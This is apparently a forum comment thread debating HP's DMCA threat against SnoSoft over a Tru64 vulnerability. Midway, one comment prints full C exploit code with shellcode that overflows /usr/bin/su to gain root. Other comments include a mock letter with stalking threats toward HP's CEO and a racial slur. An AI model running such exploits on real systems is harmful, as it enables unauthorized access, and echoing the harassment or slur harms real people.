HP Uses DMCA To Quash Vulnerability Publication
Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
What if SnoSoft suddenly opened a branch office in, say... Egypt... then an employee of the Egypt office became aware of the vulnerability and announced it in Egypt.
Would that be a valid workaround for the DMCA?
So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?
Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.
People shape laws. Not the other way around.
that someone is writing down all these "infractions" of the DMCA so that regular people can see a) what a pathetic joke this law is and b) that the government is no longer making laws for the people but for the lobbyists instead.
Wouldn't this be similar to M$ deciding to sue virus writers for exposing security flaws in Windows? It's awful that companies have decided to start prosecuting anything, even when people are just trying to help. It is ending the hobbyist mentality that helped produce such quick innovation over the last thirty-some years.
When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.
Anyone still feel like laughing?
Here's another fucking BIG CORP trying to strong-arm to get their way.
Fuck HP. It's like Ford trying to get the safety concerns of the Pinto hushed up.
Consumers are in danger, and WE COME FIRST.
Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...
-Chris
--an unbreakable toy is useful for breaking other toys--
If suits like this go to trial, and don't result in huge gains for the plaintiff, the caselaw will tend to discourage others. In some ways that would be better than a repeal.
-fb Everything not expressly forbidden is now mandatory.
Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford Explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."
When will people learn this is the same thing?
Finding and publishing a security hole in an OS is not a way to circumvent copyright protection.
If I take over somebody's Tru64 machine via this security hole, I haven't broken copyright at all.
Now, if I take documents off of the server, then I may be breaking copyright, but I don't think the connection is strong enough to stand up in a court of law.
I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright. Does that mean we should ban guns since they are a possible copyright protection circumvention device?
Wait, let me see if I get this straight...
Code has "flaw"
"Hackers" find flaw and get threatened with a half-million-dollar lawsuit.
This is just insane. When will this ever end? HP should be thanking them. I think what needs to be done is a grassroots lobbying campaign amongst the "hackers" to create their own soft money lackeys in DC. And do away with all this DMCA and RIAA BS once and for all. I'll click the PayPal button.
I am curious which part of the DMCA would be violated in exposing this security flaw?
It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.
But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.
It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?
take them to court. This would be a great case to show just how unconstitutional this law is.
Customers have a right to know about the product, and SnoSoft has the right to speak out about it. Isn't this a clear case where the DMCA violates the First Amendment?
Simply linking to the source code, like they are, could get them into trouble, could it not?
http://deepmagic.securify.org.uk:8080/su.c
HP bad, DMCA bad
MPAA and RIAA have caused more destruction of American freedom than anyone else in the past decade.
* Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.
-- Don't Tase me, bro!
"On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "
Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
Come to the University of Mars! Classes starting soon!
this is really a shame. hp was one of the technology companies that had a lot going for it.
when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achieve the immediate goal of suppressing bad stuff (real or imagined).
so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.
eric
p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.
got fed up of corporate bullshit
here is the warez, nothing special, but it does the job
note, this is just one of many many exploitable bofs in tru64 5.x
http://deepmagic.securify.org.uk:8080/su.c
phased
phased@mail
How are we to feel secure while computing if it is illegal to check up on the companies providing the software/hardware solutions?
... except the criminals who are going to exploit the vulnerability and steal hard-earned money.
Imagine, if you would, a secure piece of software (or a secure piece of hardware) is sold to handle monetary transactions; no one can verify that the software/hardware is in fact secure.
Yay for the DMCA for protecting corporations instead of the individual!
my 2 cents.
I will never buy another one of your products, and I am seriously considering returning the ones that I have. I am in a position that has a great deal of spending power and 95% of the say as to what my company purchases, and I will never purchase an HP or Compaq product again. Thank you very much.
Sincerely,
A Former Customer.
(B) + (D) + (B) + (D) = (K) + (&)
You know if every /. reader just sent their legal department mail asking for the address to send back all their HP products, it might - just might - get their attention. I am gonna call from my business tomorrow and tell them I am sending back all my company's HP products and switching every printer to LexMark.
to keep sucking at the tit of the New HP.
Money is like a drug, and Bruce is hooked.
(Why is Bruce two-faced? He talks about Open Source, but won't even mention any OS other than Linux.)
In other news today, the FBI raids the offices of SnoSoft in search of DMCA-prohibited cracking tools; they immediately seize compilers, source code, and felt markers.
It appears that Mr. Ferson's current e-mail address is kent.ferson@compaq.com.
Just a suggestion...
- Security through Obscurity
and- Security through Diligence
we now add the mighty- Security through Litigation?
To be fair, when do the handgun designers go to jail again?
Kevin Fox
Ok someone fill me in here:
How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?
Here's the source, baby!
A big customer could claim this damages their ability to operate and sue HP for suppressing information, the absence of which could lead to increased vulnerabilities in their systems.
It's too bad that people have egos, also, because if things like hard crypto implementations, security information, and so on were simply released anonymously into various outlets (e.g., not just the net), there would be nobody to sue.
In this case I think there won't be anybody to sue either -- the individual who made the report might not be subject to US law.
Take this to its logical conclusion, and realize that computer systems in the USA will tend to be less secure than their counterparts in free countries that do not suppress information exchange. I wish it were simpler to relocate to Europe; it sure as hell appears to be easy for them to relocate to the USA.
-fb Everything not expressly forbidden is now mandatory.
The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.
HP trying to cover this up just proves it's a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS.
People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their careers. Data important to one's career (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.
We have the right to know exactly what problems there are in our software.
social sciences can never use experience to verify their statemen
Is it me, or if you changed HP to Microsoft, would this actually sound normal to most of us, as wrong as it may be? I'm actually quite disappointed.
My question is, why has it become illegal to expose a threat to security? Isn't this what people do all the time to our government? Just because it puts a black mark on HP or Microsoft or whoever else it happens to, why should the person who was protecting the larger population from a possible threat be punished?
my $.02
The DMCA just made this world a safer place.
Don't ask, don't tell.
-- My HARDWARE, My CHOICE.
This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...
Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.
Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).
It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
and its first post-merger PR disaster. May the HP way rest in peace.
CEE5210S The signal SIGHUP was received.
Email their president and CEO from this page!
Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.
--Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
If anyone is interested, you can send HP's CEO, Carly Fiorina, an e-mail from the "contact us" page on HP's website. Click on "Contact HP"; scroll down to where it says e-mail HP and click on the box below where it states "I have a question that is not product or service related". At the bottom of the list click on Carly Fiorina's name. Send the CEO a message with your concerns.
HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."
As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.
Schwab
Editor, A1-AAA AmeriCaptions
For HP to swallow Compaq, pass IBM in size and turn into Evil Incarnate -tm.
Sad.
Compaq R.I.P. One of THE cool companies. Made great servers, now slandered as "HP" ProLiants... I despised HP Netservers as a network engineer.
Corporatism != Free Market
`Oh, now _this_ is fair!'
Got time? Spend some of it coding or testing
Some people seem to forget that the real villain here is the US Government, who made DMCA into law.
HP is just using any legal means it has available to defend its (perceived) interests. If they didn't do it, someone else would, over time. Or even if no one did, the mere threat that it is a possible legal recourse for a grumpy corporation is enough to put a chill on these things.
The existence of the DMCA is the real problem. So focus on that.
For those of you who are HPaq-ese impaired, here is the message:
Dear HPaq customers,
We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. If you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive customers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, my coke dealer is here. And don't forget to F off!
P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DMCA.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
You can download the source code here.
The theory of relativity doesn't work right in Arkansas.
http://deepmagic.securify.org.uk:8080/su.c Pretty small program!
What a perfect example - a really easy-to-demonstrate abuse that the DMCA allows. Hell, I could show this case to my non-techie relatives, and they'd understand just how wrong it is. Go HP - this type of bullying helps more than 10 highly paid lobbyists.
"What we have here, is a failure to communicate." - Cool Hand Luke
I smell gravy cooking!
keanmarine.com
Why not just all mirror this code, let HP figure that one out...
Author, Shell Scripting : Expert Re
HP -> MS = 42.(not the difference, the set of letters between them)
42 is the answer to life, the universe, and everything.
Just what exactly did Douglas Adams know about Tru64...and where is my Pan-galactic gargle blaster????
Oh sorry, it's over here.
When HP finds out that news.com is publishing a link to the exploit, they'll probably want to shut them down too.
Sorry to hear that you're no longer interested in the 64-bit market segment. I can't really blame you; I suppose you're better off selling medical equipment like heart monitors. Too bad that you made it quite clear that you have no intentions of ever coming back, or else you wouldn't have taken a shit right in our faces before you left.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* bzero() */
#include <unistd.h>

/* Alpha shellcode exactly as it appeared in the post (two fragments each
   terminated by \xff\xff\xff\xff); the bytes are left untouched here. */
char shellcode[] =
    "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2"
    "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22"
    "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43"
    "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43"
    "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26"
    "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26"
    "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42"
    "\xff\xff\xff\xff";

int main(int argc, char *argv[])
{
    int i, j;
    char buffer[8239];
    char payload[15200];
    char nop[] = "\x1f\x04\xff\x47";   /* one Alpha no-op instruction */

    bzero(buffer, sizeof(buffer));
    bzero(payload, sizeof(payload));

    /* first argument: 8233 bytes of 'A' followed by the five bytes from the post */
    for (i = 0; i < 8233; i++)
        buffer[i] = 0x41;
    buffer[i++] = 0x01; buffer[i++] = 0x04;
    buffer[i++] = 0x01; buffer[i++] = 0x40;
    buffer[i++] = 0x01;

    /* second argument: a 15000-byte nop sled, then the shellcode */
    for (i = 0; i < 15000; ) {
        for (j = 0; j < 4; j++)
            payload[i++] = nop[j];
    }
    for (j = 0; j < (int)sizeof(shellcode); i++, j++)
        payload[i] = shellcode[j];

    printf("/bin/su by phased\n");
    printf("payload %db\n", (int)strlen(payload));
    printf("buffer %db\n", (int)strlen(buffer));
    execl("/usr/bin/su", "su", buffer, payload, (char *)0);
    return 0;
}
The theory of relativity doesn't work right in Arkansas.
At least when bnetd was sued there was some theoretical idea of a "copyrighted" work that was being circumvented. What is HP going to do, claim that their OS's intellectual property is actually being protected by their lack of a bounds check in their buffer overflow? So when the next hole in Outlook is discovered and Microsoft doesn't want to do anything about it for 6 months, yet exploits are being found in the wild, are they just gonna sue the script kiddies rather than spend the extra $$ to fix the stupid off-by-one error? This is silly and exactly the kind of abuse that the open source community has been clamoring about since the DMCA's inception!
If religious zealots don't believe in Evolution, then why are they so worried about bird flu?
It's worthwhile taking some lessons from history. Time was, there was a huge debate in the press - somewhat before George Washington - about whether Locksmiths should publish data about vulnerabilities of locks.
The answer that was eventually arrived at was "Of course, because the professional crooks already know the vulnerabilities, and to publish would reveal to the customers what shoddy goods some locks were, and help improve the state of the art." (sorry, I've been unable to find some quotes on the web). The parallels are obvious.
Another parallel : see the Associated Locksmiths of America's Code of Ethics.
Zoe Brain - Rocket Scientist
Bah.
Fuck off HP, and I thought you weren't a Disney-like asshole company.
But I'm wrong. I won't be buying anything from you guys, that's for damn sure.
-- Note: If you don't agree with me, don't bother replying. I won't read it.
But Apache doesn't have to support as many investors as HP does. Think about the investors. If this bug were to be reported, these poor, defenseless investors would lose money. You don't want them to lose money, do you? That wouldn't be very nice of you.
Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.
Zoe Brain - Rocket Scientist
How about we set up a "standard" for finding unpublished documents on a P2P network. That way techs can get the information necessary to do our jobs, and the authors can be somewhat safe in publications.
AND, just in case anyone from HP is listening. I handle purchasing for my company. Our order is being canceled due to "lack of information about vulnerabilities"....
Ever since Digital was bought by Compaq, it has gone down the tubes...
If it can be done to RIAA for simply having their sock puppet propose a bad law, it damn well better be done to someone who actually uses a bad law like DMCA for immoral purposes.
I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.
The first issue is HP's request that Bruce Perens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.
The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.
Please reconsider your decision to use the Digital Millennium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.
I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.
It just occurred to me thinking over this issue that HP and the other major corporations have made their positions plain - they have decided how they are going to deal with our ability to easily disseminate and copy information. The government has decided what it is going to do in regards to this issue - that is to side unilaterally with the corporations against its constituents.
Interestingly, we've decided what we're going to do too. Anyone reading this post (trolls and whoever is pressing refresh in attempts to get fp excepted) has already pretty much decided about how they feel. Most /. readers to one degree or another favor the rights of the individual to express him or herself, to share information and to act to actively uphold those ideals.
And one of the brilliant things about /. is that it provides us with a forum to sound off and occasionally mobilize.
What many of us (me included) need to do is really figure out exactly how we're going to react to all of this. Not just what I'm going to think, but what I'm going to actually do. This sort of thing threatens our personal freedoms, in some cases threatens our livelihood, threatens shared resources that we hold to be valuable, etc. Cheering on the occasional script kiddie who DoS's a corporate server isn't enough.
Not trying to start a revolution here, just trying to clarify my thinking in a public place...
I'd say: why help those companies in the first place? They charge an arm and a leg for their defective software, let them fix it themselves. If their software doesn't work as advertised, sue them if your contract permits it, or switch to something else. Don't waste your time and money on doing some vendor's quality control for them.
Unless they are doing it for the credit, there's no reason at all to not simply release the source code anonymously, without claiming any credit for it whatsoever.
No credit -> No blame
I can see HP's problem... the posting referred to the exploit as "warez", so it was a "r3534r(|-|3r" and not a "researcher" -- some kid working on his PhD -- who came up with the exploit, from all evidence. Being realistic, they *have* to bluster and otherwise overreact: they have a fiduciary responsibility for professional feather ruffling, given the apparent source of the exploit.
Alternately, they could always *fix* the problem...
-- Terry
Interestingly enough, I fail to see how SF could remove one post from Bugtraq, due to the many independent archives around the world. Or maybe is that just a first step before suing SF?
It's HP's own damn fault the flaw exists. And now they are trying to squash out legitimate publication of it. All they are doing is driving the exploit underground where only script kiddies will have access to it.
If the security community doesn't know about the flaws (and workarounds to fix them), and the script kiddies do, they are biting their own asses because they are going to have a really shitty insecure product that is going to have a reputation for being hax0red.
Yeah, the flaw was released without telling HP first, but who cares... HP needs to FIX THEIR SHIT and stop the bitching.
Need Free Juniper/NetScreen Support? JuniperForum
Apparently big corporations don't want flaws in their products exposed and prefer to use lawyers to "secure" their OS. So it's back to the days when exploits floated around in Usenet news (from untraceable sources) and a worm/virus had to bring down millions of systems before the software companies admitted there was a security hole?
And there I thought that those companies had learned to value security over marketing issues. But obviously thinking further into the future than 3 months is uncalled for these days. Business sense is dictated by the shareholders now, and the result is short-term tactics without overseeing the big picture (in this case that fixing security holes is more important in the long run than sweeping them under the carpet).
"By the way if anyone here is in advertising or marketing... kill yourself." -- Bill Hicks
If the issue is because Bruce has already gone on record against the DMCA, then yes, I can see the conflict. But asking Bruce to choose whether he serves the interest of the open source community yet works for a company doing odd things with the DMCA, then no, I don't see any reason to choose sides.
To Whom It May Concern,
Due to HP's recent abuse of the DMCA I have decided to never purchase an HP or Compaq product again. I am currently the IT manager of a consulting company, which shall remain nameless due to fear of litigation, and am in line to eventually become the CIO of this rapidly growing company. I have in the past been a supporter of HP products, especially your printers and UNIX servers, and Compaq products as well, and this decision has forced me to re-evaluate my commitment to HP. I recently purchased two HP LaserJet printers; one of them has been installed, but the other is still in the box and will be returned in exchange for a different manufacturer. I have a purchasing power of tens of thousands of dollars per year, that will be growing to hundreds of thousands in the future, as well as 95% of the say as to what my company purchases. I can wholeheartedly state that we will never purchase an HP or Compaq product again. I will also be encouraging my colleagues and personal friends to stay away from HP and Compaq products in the future as well. It is time for companies to learn that not only can their CEOs not cheat their shareholders out of their retirements, but they cannot use litigation to solve the problems created by their inferior products and broken business models. Thank you for your time and consideration.
Sincerely,
P.S. Please feel free to email me with any questions or comments you might have regarding this note.
(B) + (D) + (B) + (D) = (K) + (&)
Why when Felton stood up, they backed away? They don't have an EVIL HACKER to villify.
Fight Spammers!
"Does that mean we should ban guns since they are a possible copyright protection circumvention device?"
That's a great idea! Wow, you should be a senator!
The real reason they are pissed is that they fired the Tru64 people already and HP does not want to make a patch for it. HP was pissed at OpenSSH when the vulnerability in it came out. They had to hire the people back to fix the problem; now they have to hire them back again.
Is it a violation of the DMCA to attempt to circumvent the protection of the DMCA by damaging the DMCA?
I thought the DMCA was only used to protect against any circumventing of technologies that protect copyrighted materials....
Since the circumvention is related to a security system that doesn't protect a copyrighted material, can they even use the DMCA?
When was the last time the EFF won a major case?
It seems to me that EFF has had no significant impact on legislation or case law.
The 1st amendment tack is all played out; find some case law relating to property and copyrights and argue around them.
At this point, I propose an IT general strike.
The corporate powers have already taken your retirement funds. The U.S. government has given your jobs to non-citizens. CEOs have made off with ill-gotten gain based on your intellectual property.
Maybe when the phone stops working, the lights go out, and electronic financial transactions stop, maybe, just maybe, important issues regarding freedom will get noticed.
Am I proposing an active attack on infrastructure? NO, never... just inactive neglect.
As we all know, you are getting laid off one of these Fridays anyway.
The Janitoras went RealLife on him. He has lost his job and his rent controlled apartment. His domain was DoSed off of the net. He can only post from the free stations at the library.
It is just ridiculous that SF caved on this issue. Another good list bites the dust.
I wonder if HP realizes the shitstorm it just released on itself, every other OS manufacturer out there, and every other company and individual that codes publicly released software.
In the recent past the community itself made a reasonable effort to begin notifying developers that they had bugs in their code and give them a reasonable amount of time to fix said code and deploy patches before making the bugs public. It wasn't a perfect system and not everyone played by the "rules", but at least people seemed to want to behave responsibly.
Now HP has thrown down the gauntlet, and given the one finger salute to every uber haxor, wannabe, script kiddie, grey hat, glam hungry geek on the planet.
Gee the "New HP" sure is acting like some old ignorant twits. You cannot police what you cannot control. And as quickly as the "security community" tried to legitimize themselves - many of them can vanish right back under the limitless depths of the ether.
Mmmmm peer to peer websurfing, mailing lists and newsgroups. Masked behind proxy after proxy. Hosted on a million webservers. *Homer Gurgle*
http://windows.scares.us
1. Start (Intern|N)ational Computing Safety Board (as opposed to the U.S.'s National Transportation Safety Board).
2. ???
3. Profit! (either from $BIG_CORP bribes or actually getting the Board to work for its intended purpose, either should work)
4. ???
5. Profit! (from lack of $BIG_CORP)
In other words: "This is so cool! I'll use your money to get elected, then I'll put your entire industry in prison to cover my tracks!" --Dogbert
Let the crackers have it.
...richie - It is a good day to code.
I'll admit I'm a little new to this subject. Looking over the comments it seems overwhelmingly against HP. Correct me on this, but didn't snosoft publish information on the vulnerability plus code to exploit it without letting HP know first, and give them a chance to correct it? If somebody figured out how to break into your house and published on the internet and you found out the hard way, wouldn't you be pissed? If I don't have the facts right, please set me straight!
It might be interesting to watch HP's stock values, if word of this gets out before a patch does.
Sheesh, evil *and* a jerk. -- Jade
Flamebait is attempting to outrage eg "You're a fucking idiot".
A troll is something that attempts to subtly provoke you. Misspelling Linus Turvaldes name, for example, and intentional errors (Linux DOS, VB kernel hacker, etc). Look at egg troll's google posts. Most are way too obvious, (but still get biters). If you removed some of the more glaring errors, they'd be perfect trolls.
and fuck COMPAQ too, the inventor of the Tru64 DMCA-loving UNIX.
Yes... Things change... Now, it's called the Hewlett Compaqard way... and it will go downhill, sadly.
Just because they work there does not mean they agree with HP's DMCA debacle. People have the right to work where they please and we have the right to ignore them if we choose.
What is the difference between a private company and a public company?
The public company sells stock on a public exchange. This makes it subject to certain financial disclosure requirements. A private company is generally owned by its principals who are also generally involved in the day to day management of the company. A private company does not have to make significant financial disclosures to the public or its employees.
In both cases the goal of the company is to make money for its owners/investors.
In most cases the ultimate goal for a private company is to 'flip', or go public, cashing out the owners. The process of flipping is carefully engineered to present an appearance of great value where in fact there may be none.
NONE of this has anything to do with customer satisfaction other than that needed for commercial operations.
It's not "rediculous", it's RIDICULOUS.
It's NOT spelt the way you pronounce it, ok ? Pet hate. Get a dictionary/spell checker ASAP.
hp -> B====D O: - customers
3l33t h4X0Rz suck
Anal DMCA cHOp!
X'Ploit? What xploit?
Companies that deal with software are less supporting of DMCA. If they have a bug in their software, they whip out a patch, put it on their webpage and tell people to install it themselves. They have little to lose if someone hacks around their software since they can more cheaply play a game of cat and mouse with the hackers with the full source code at their disposal where the hacker has none of the proprietary code.
Mrs Fiorina,
I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.
Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.
Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.
This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.
I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to recommend that anyone give their money to Hewlett Packard.
Looking forward to your response.
[Name Removed]
--
"I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett
I know this is -1, but please, the law is the DMCA. Fix the dyslexia and straighten the letters. DMCA. Not how you spelled it. That's wrong. DMCA. I'm not going to write what you wrote because you might think it's correct for some reason.
In the future, please, help stop the spread of this rampant dyslexia. Digital Millennium Copyright Act. DMCA.
Probably because the EU has no "First Amendment".
That being said, it's rather sad how having a "First Amendment" here in the states doesn't seem to matter for much anymore.
The DMCA is just one of the latest signs of "First Amendment rot" to infect us. People are getting jailed and fined for using foul language. That is just stupid.
So called "Hate Crime" laws just criminalize what you say. If I am a white person and I kill a black man while yelling "die nigger die!" how is that any worse than killing a white man yelling "die sucker die!"? Killing is already illegal. I "hate" the black man, but for some reason I don't "hate" the white man? So killing him was what, an act of love?
Even "anti-terrorism" laws are inherently anti-free speech. All terrorism type laws do is criminalize politically incorrect actions. Giving to the IRA, or the PLO, or FeGong (is this last one correct?) is either patriotic, or helping terrorists. The only difference is who's side you are on. The American revolutionaries were freedom fighters to the colonists and terrorists to the British. Same with the Palestinian Liberation Organization. The Irish Republican Army is fighting to free Northern Ireland from British rule, to the British they are a terrorist organization. The same with al-Qa'eda, to their supporters they are terrorists, to most September 11 Americans they are terrorists. Who you talk to, associate with, ideologically support shouldn't be illegal.
What happened on September 11th was already illegal. If a bunch of random people hijacked a few planes and crashed them into the WTC and the Pentagon, guess what, we could still prosecute them. Hijacking, murder, conspiracy to commit murder, etc. are all already illegal. All that calling it terrorism does is give the government an excuse to grant themselves new sweeping police powers. They curtail your civil and constitutional rights, and then broaden the definition of terrorism to include anyone who is against them ideologically or politically. Anti-WIPO, Anti-RIAA/MPAA, Anti-anything the powers that be like? Congratulations, you are a terrorist. Take apart your DVD player, you my friend are a terrorist. Believe that people should stop eating meat or wearing fur, terrorist. Think that Pres. Bush has gone too far with the Patriot Act/Dept of Homeland Security/Dept of Public Propaganda/National ID card/Military tribunals/etc. most definitely a terrorist. Please report to the nearest detainment facility, where you will be stripped of your customary legal protections, locked up for an indeterminate period of time, possibly tortured, denied a lawyer, a trial, or an appeal. No need for anyone else to be concerned. You are a "terrorist". These things must be done to keep society safe. Yeah right.
Saying the wrong thing, or the right thing to the wrong people is now very much illegal. The EU is starting to look downright enlightened, and that's a scary thought.
Just my $0.02 (Canadian, before taxes)
Due to HP's recent abuse of the DMCA I have decided to never purchase an HP or Compaq product again
I would be more specific. Cite the actual situation concerning the Tru64 vulnerability and their threat of litigation. If you simply use the phrase, "HP's recent abuse of the DMCA", and nothing else, the recipient may not know what you are talking about.
Here's what I sent. Do you guys think I should've emphasized the negative effects of the DMCA on HP's public image, a little more? Hard to pitch the balance right..
-------
Dear Miss Carly Hot Pants (if I may call you that):
I think you're a babe. I've been admiring you ever since I saw you with that dweeb Compaq CEO on CNBC. What's he got that I haven't got? I wish it were me standing on that stage next to you, shaking your hand. I hope he gets cancer and dies.
I read in a magazine that you like to go running. I like to go running too. I think you'd like to go running with me. I'm going to find where you live, so I can go running with you. I own a lot of HP products.
I want to get into your pants and learn more about the "new HP way". I want to "check the bottom line" with you (that's an accounting joke Carly, I hope you're laughing. I hate it when people don't laugh at my jokes). I think you'd really understand me. I know you won't just send me a form letter like Martha did.
Signed,
Your biggest fan.
PS: don't sue that hacker. But if it meant you and I could be together, I'd let you sue him. I love you Carly.
When I said;
"...The same with al-Qa'eda, to their supporters they are terrorists, to most September 11 Americans they are terrorists."
I meant;
"...The same with al-Qa'eda, to their supporters they are FREEDOM FIGHTERS, to most September 11 Americans they are terrorists."
Sorry for the blunder.
Just my $0.02 (Canadian, before taxes)
Well said, sir.
"Ferson also said that HP reserves the right to sue SnoSoft and its members 'for monies and damages caused by the posting and any use of the buffer overflow exploit.'"
If that is the case, then I think consumers have the right to sue HP when their systems get hacked with a known vulnerability.
It is a 2 way street baby!
--dan
I am not much of a political science student. Can someone inform me how this works? Congress can pass all the stupid laws it wants to, correct? But then usually a case will end up going to the supreme court where the high court examines and can potentially overturn certain unfair/unjust laws. Am I correct on this? Wouldn't it be good to welcome a high visibility case of the DMCA. Then, and only then, will the high court look at this issue.
If companies start to make it a habit of suing people who tell the truth about them people will stop trusting these companies. Why did they tell HP about it first? They were honest and got bitch slapped. So, next time the researchers will think twice before going to the company. Maybe they will just publish on FreeNet or leak their story on Slashdot first?
Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.
